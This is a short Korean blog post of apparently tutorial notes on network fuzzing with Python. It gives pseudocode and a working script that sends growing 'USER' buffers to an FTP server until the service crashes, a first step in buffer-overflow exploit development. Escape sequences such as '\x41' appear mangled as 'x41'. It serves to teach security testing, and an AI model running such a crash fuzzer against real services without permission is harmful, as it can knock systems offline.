[primalsecurity] 0x3 – Fuzzer

파이썬으로 반복적인 연결과 다양한 값을 입력하는 퍼징 공격이 효율적임

 

의사코드

 

<import modules> # most likely will be socket, sys, but if its a web service you might import httplib, urllib, etc.
 
# Set up remote IP/Port variables
# Invoke the script: ./script.py <RHOST> <RPORT>
RHOST = sys.argv[1]
RPORT = sys.argv[2]
 
# Define your buffer string that will be incremented until a potential crash
buffer = 'x41'*50
 
# Create a loop that will connect to the service and send the buffer:
while True:
  try:
    # send buffer
    # increment buffer by 50
    buffer = buffer + 'x41'*50
  except:
    print("Buffer Length: "+len(buffer))
    print("Can't connect to service...check debugger for potential crash")

 

해당 의사코드는 여러 서비스를 대상으로 퍼징이 가능

 

USER명령으로 FTP서버 퍼징하기

 

# Import the required modulees the script will leverage
# This lets us use the functions in the modules instead of writing the code from scratch
import sys, socket
from time import sleep
 
# set first argument given at CLI to 'target' variable
target = sys.argv[1]
# create string of 50 A's 'x41'
buff = 'x41'*50
 
# loop through sending in a buffer with an increasing length by 50 A's
while True:
  # The "try - except" catches the programs error and takes our defined action
  try:
    # Make a connection to target system on TCP/21
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(2)
    s.connect((target,21))
    s.recv(1024)
 
    print "Sending buffer with length: "+str(len(buff))
    # Send in string 'USER' + the string 'buff'
    s.send("USER "+buff+"rn")
    s.close()
    sleep(1)
    # Increase the buff string by 50 A's and then the loop continues
    buff = buff + 'x41'*50
 
  except: # If we fail to connect to the server, we assume its crashed and print the statement below
    print "[+] Crash occured with buffer length: "+str(len(buff)-50)
    sys.exit()

 

특이 사항이 발생하도록 USER명령을 보내며 뒤로 'x41'로 채워서 버퍼를 소진 시킴

반복적으로 다른 유형의 문자로 버퍼를 채워 보내야함

 

고급 퍼징 도구 인 스파이크는 타겟 서비스를 중단 시키려고 다양한 양과 유형의 문자를 보냄